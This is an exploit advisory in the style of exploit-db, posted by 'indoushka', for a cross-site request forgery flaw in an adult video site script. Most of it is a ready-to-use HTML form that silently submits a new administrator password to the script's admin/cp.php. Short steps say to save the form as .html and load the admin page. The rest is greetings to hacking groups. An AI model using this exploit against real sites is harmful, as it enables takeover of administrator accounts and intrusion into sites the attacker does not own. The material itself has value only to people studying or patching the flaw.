Adult Video Site cross site request forgery change administrator password exploit.
82c463788c212ab40d73c9378f60858bc316e3337caba35e8d33cdcbf52d0d3c
========================================================================================
| # Title : ADULT VIDEO SITE SCRIPT CSRF Chang Admin Password Exploit
| # Author : indoushka
| # Home : www.dz-blackhat.com |
| # Web Site : http://hotfile.com/dl/32750290/bcc0159/videoscript.rar.html
| # Tested on: Lunix Français v.(9.4 Ubuntu)
| # Bug : ADULT VIDEO SITE SCRIPT CSRF Chang Admin Password Exploit
====================== Exploit By indoushka =================================
# Exploit :
<table width="80%" border="0" cellspacing="10" cellpadding="10" class="logintable1">
<tr>
<td><font size="4" face="Verdana, Arial, Helvetica, sans-serif, Trebuchet MS">Change
Password </font></td>
</tr>
<tr> <form action="http://127.0.0.1/videoscript/admin/cp.php" method="POST">
<td><div align="center">
<table width="90%" border="0" cellspacing="4" cellpadding="4">
<tr class="text">
<td width="44%"><div align="right">New Password :</div></td>
<td width="56%"><input type="password" name="npass" class="input"></td>
</tr>
<tr class="text">
<td> <div align="right">New Password (Re-type): </div></td>
<td><input type="password" name="npass1" class="input"></td>
</tr>
<tr class="text">
<td> </td>
<td><input type="submit" name="Submit" value="Submit"></td>
</tr></form>
<tr class="text">
<td> </td>
<td> </td>
</tr>
</table>
2 - Save As .html
3 - Go to http://127.0.0.1/videoscript/admin
Dz-Ghost Team ===== Saoucha * Star08 * Redda * Silitoad * XproratiX * onurozkan * n2n * ========================
Greetz :
Exploit-db Team :
(loneferret+Exploits+dookie2000ca)
all my friend :
His0k4 * Hussin-X * Rafik (www.Tinjah.com) * Yashar (www.sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc)
www.owned-m.com * Stake (www.v4-team.com) * r1z (www.sec-r1z.com) * D4NB4R http://www.ilegalintrusion.net/foro/
www.securityreason.com * www.m-y.cc * Cyb3r IntRue (avengers team) * www.alkrsan.net * www.mormoroth.net
--------------------------------------------------------------------------------------------------------------